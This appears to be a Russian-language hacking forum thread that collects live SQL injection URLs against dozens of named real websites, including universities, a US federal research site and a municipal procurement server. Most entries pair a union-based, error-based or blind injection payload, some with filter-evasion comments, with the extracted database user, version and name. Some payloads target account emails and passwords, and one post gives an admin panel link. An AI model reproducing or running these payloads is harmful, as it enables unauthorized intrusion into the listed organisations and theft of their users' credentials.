SQL Инъекции

http://www.golfdm.co.uk/site/pages.php?fid=0,13&pp_id=38%20union%20select%201,2%20,3,group_concat%28acc_id,0x3a,acc_email,0x3a,pword%20%29,5%20from%20tblaccount--

 

Code:

http://www.regula.ws/index.php?id=57&ml=ru and 1=1

[blind]

User: regula@localhost
Version: 4.1.18-standard
Database: db_regula

PR 5
тИЦ 30

Code:

http://www.kolesa-spb.ru/tiresitems.php?id=308' and 1=1 and 'x'='x

[blind]

User: [email protected]
Version: 5.1.49-3-log
Database: z96996_1

PR 2
тИЦ 30

Code:

http://g10sms.com/see.php?id=4716 and 1=1

[blind]

User: [email protected]
Version: 5.0.92-community
Database: gsmscom_newsms

PR 4

 

Code:

http://si.ras.ru/index.php?pid=%271%27and%28exists%28select%281%29from%28users%29w%20here%28ascii%28lower%28substring%28user_id,1,1%29%29%29%29like%2850%29%20%29%29and%271%27%3C%272%27

блинд
тиц 60 Пр 5

 

ТюмГУ: Научно-методический журнал

Code:

http://perspectives.[B]utmn.ru[/B]/?n=4&y=[COLOR=Red]-[/COLOR]2004[COLOR=Red]+union+select+1,2,3,4,5,6,7,group_concat%28table_name+separator+0x3a%29+from+information_schema.tables+where+table_schema=0x64625f313539[/COLOR]+--+

version: 5.5.12
database: db_159
user: dbu_159@localhost
+ PR: 4/10 | тИЦ: 20

ТюмГУ: Тесты (.blind)

Code:

http://tests.utmn.ru/tests.php?gr=72+and+substring(@@version,1,1)=5

P.S. Кто первый доберётся до суперкомпьютера?

Сервер Муниципального заказа города Тюмени

Code:

http://mz.tyumen-city.ru/cgi-bin/konkurs.pl?action=invite&id=[COLOR=Red]-[/COLOR]1110024[COLOR=Red]+union+select+1,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,3[/COLOR]+--+

version: 4.1.22
database: zakaz1
user: root@localhost
+ PR: 4/10 | тИЦ: 20

 

Sss .

 

Code:

http://www.zelfbouw-groenestroom.nl/redir.php?id=165 and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1

User: [email protected]
Version: 5.0.91-log
Database: DB5362771

PR 3

Code:

http://www.dogsite.ws/web/r.php?ID=393.9 union all select 1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+

User: [email protected]
Version: 5.0.67
Database: ds

PR 2
тИЦ 70

Code:

http://www.fursuit.co.uk/category.php?id=2 /*!30000and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/

User: fursuit_fursuit@localhost
Version: 5.0.92-community
Database: fursuit_links1

PR 3

Code:

http://www.fellrunner.org.uk/races.php?id=' and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1

User: fra@localhost
Version: 5.1.54-1ubuntu4
Database: fra1

PR 4

Code:

http://www.designdeck.co.uk/article_details.php?id=246 and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1

User: design_user@localhost
Version: 5.0.92-community
Database: design_db1

PR 3

 

1)

PR 5

2)

 

Code:

http://www.biochar.org.uk/abstract.php?id=37.9+union+all+select+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10+--+

User: [email protected]
Version: 5.0.77
Database: biochar

PR 5

Code:

http://core.materials.ac.uk/search/detail.php?id=2762 and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1

User: [email protected]
Version: 5.1.45-community
Database: core1

PR 5

Code:

http://www.huhmagazine.co.uk/view_article.php?id=2215.9+union+all+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+--+

User: Jack@localhost
Version: 5.0.86
Database: jacklowe_huh

PR 5

 

http://101vanna.ru/detail.php?id=110&pid=-543+and+1=2+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--

5.0.90

 

Code:

http://www.underwatertimes.com/news.php?article_id=999999.9 union all select 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7+--+

User: underw6_full@localhost
Version: 5.0.92-community
Database: underw6_762521

PR 5
тИЦ 20

Code:

http://www.jpr.org.uk/publications/publication.php?id=138&sid=155 and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1

User: jpr@localhost
Version: 5.1.50
Database: jpr31

PR 6
тИЦ 20

Code:

http://www.healthgrid.org/news/index.php?id=32.9+union+all+select+1,concat_ws(0x3a,user(),version(),database()),3+--+

User: healthgrid@localhost
Version: 5.0.51a-24+lenny5
Database: healthgrid_website

PR 6
тИЦ 10

 

Странно, но пробелы и плюсы у меня упорно нехотели работать ... решил проблему тунсами, можно заменить на плюсы...

 

тИЦ 80, PR 4, ЯК, DMOZ

Выводится между => <=

HTML:

http://www.hotels-in.ru/hotel.php?hid=999999.9+union+all+select+concat(0x3d3e,unhex(Hex(cast(database()+as+char))),0x3c3d)--

тИЦ 10, PR 2

HTML:

http://aquatics.ru/accessory.php?aid=999999.9+union+all+select+1,concat(0x3a29203d3e,unhex(Hex(cast(database()+as+char))),0x3c3d20283a),NULL,NULL,NULL,NULL,NULL,NULL--

EASYHOMEPOKER
Мб что-нибудь найдете

HTML:

http://easyhomepoker.com/player.php?id=999999.9+union+all+select+1,2,concat(0x3d3e,database(),0x3c3d),NULL,NULL,NULL,NULL--

 

Code:

http://shrs.iupui[SIZE=3][COLOR=RoyalBlue][B].edu[/B][/COLOR][/SIZE]/about/profile.php?emp_id=-22+union+select+1,concat(database(),char(59),version(),char(59),
user())+--+

VERSION : 5.0.83
DATABASE : shrsweb
USER : [email protected]
PR - 5

 

Target: http://www.championsseriestennis.com/player.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a,id,username,password
Host IP: 184.168.136.128
Web Server: Apache
DB Server: MySQL
Resp. Time(avg): 867 ms
Current User: [email protected]
Sql Version: 5.0.91-log
Current DB: gcaparulo2
System User: [email protected]
Host Name: p3nlhdb5007-07.shr.prod.phx3.secureserver.net
Installation dir: /usr/local/mysql-5.0.91-linux-x86_64-icc-glibc23/
DB User: 'gcaparulo2'@'%'
Data Bases: information_schema
gcaparulo2
PR-5

 

PHP:

http://www.al-mawrid.org/pages/research_detail.php?research_id=-5+union+select+1,concat(database(),char(59),version(),char(59),user()),3,4+--+

VERSION : 5.1.55
DATABASE : almaw0_mawrid
USER : almaw0_naveed@localhost
PR - 5

PHP:

http://www.fpl.fs.fed.us/research/highlights/view_research_highlight.php?research_id=-1+union+select+1,2,3,4,5,6,7,8,concat(database(),char(59),version(),char(59),user()),10,11,12,13,14,15+--+

VERSION : 5.0.51a-3ubuntu5.5
DATABASE : forestproductslaboratorydb
USER : root@localhost
PR - 6

 

Code:

http://kinogallery.com/news/comments.php?id=9641 and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1

User: kinogaller_kino@localhost
Version: 5.0.51a-community
Database: kinogaller_kino1

PR 4
тИЦ 140

 

Code:

http://club-edu.tambov.ru/main/methodic/index.php?id=40' and(select 1 from(select count(*),concat((select (concat_ws(0x3a,user(),version(),database())) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1

User: club@localhost
Version: 5.1.30-log
Database: club_methodic1

PR 5
тИЦ 2900

Code:

http://www.desertmuseum.org/center/edu/pp_showclass.php?id=1580 and 1=1

[blind]
User: [email protected]
Version: 4.0.18-log
Database: asdmdata

PR 6
тИЦ 20

Code:

http://www.manli.com/products/details.php?id=113.9 union all select 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+--+

User: manlico_web@localhost
Version: 5.0.92-community
Database: manlico_web

PR 4
тИЦ 130

 

Акция: Интернет без гов*а

http://www.webhostingcanada.com/faq/question.php?mode=read&question=-14+union+select+1,2,3,4,5,user(),7,8,9,10,11,12,13,14,15--+

 

labocadellobo.es PR-5

Code:

http://www.labocadellobo.es/laboca/ficha.php?menu_id=1&jera_id=14&page_id=-75+/*!UnIoN*/+/*!SEleCT*/+1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,concat_ws(0x3a,version(),user(),database()),17+--+

Code:

5.0.77:Boca2007@localhost:Boca2007

www.fam.ulusiada.pt PR-6 blind

Code:

http://www.fam.ulusiada.pt/noticias/artigo.php?news_id=1217'+and+5=substring((select+version()),1,1)+--+

(нет редиректа)

theatreinchicago.com PR-5

Code:

http://www.theatreinchicago.com/newswire.php?newsID=-215+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11+--+

Code:

4.0.27-standard:dbo141597383@localhost:db141597383

 

Админка - http://autodaynews.ru/admin/